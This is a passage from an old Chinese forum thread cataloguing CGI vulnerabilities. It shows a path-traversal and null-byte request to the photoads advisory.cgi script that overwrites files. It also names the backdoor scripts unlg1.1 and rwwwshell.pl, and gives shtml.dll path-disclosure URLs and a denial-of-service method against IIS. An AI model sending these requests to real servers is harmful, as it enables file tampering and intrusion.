|
CGI漏洞(14) 1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111&DataFile=1&Password=0&FILE
_CONTENT=%00%00%00%00%00%00%00%00%00%00%00%00%00&FILE_NAME=/lala/
\../../../../../../../home/httpd/html/photoads/cgi-bin/advisory.cgi%00.gif‘ 创建/覆盖用户 nobody 有权写的任何文件.
不知我的理解是否对,在它的zip包里我找不到to_url脚本,不知哪位同志知道? 二十七.backdoor
看到现在一些cgichk.c里都有检查木马unlg1.1和rwwwshell.pl
前一个是UnlG写的,我没见过源码,有一个是THC写的,packetstorm里有它1.6版的源码. (发帖时间:2003:9:15 07:41:21)
---玟ζ玟 (4): 二十八.shtml.dll
在Frontpage Extention Server/Windows2000 Server上输入一个不存在的文件将可以得到web目录的本地路径信息:
 http://www.victim.com/_vti_bin/shtml.dll/s.../something.html
这样将返回以下信息:
Cannot open "d:\inetpub\wwwroot\postinfo1.html": no such file or folder.
但是如果我们请求并非HTML、SHTML或者ASP后缀的文件,我们将会得到不同的信息:
http://207.69.190.42/_vti_bin/shtml.dll/something.exe shtml.dll对较长的带html后缀的文件名都会进行识别和处理,利用这一点,可以对IIS服务器执行DOS攻击,
| 
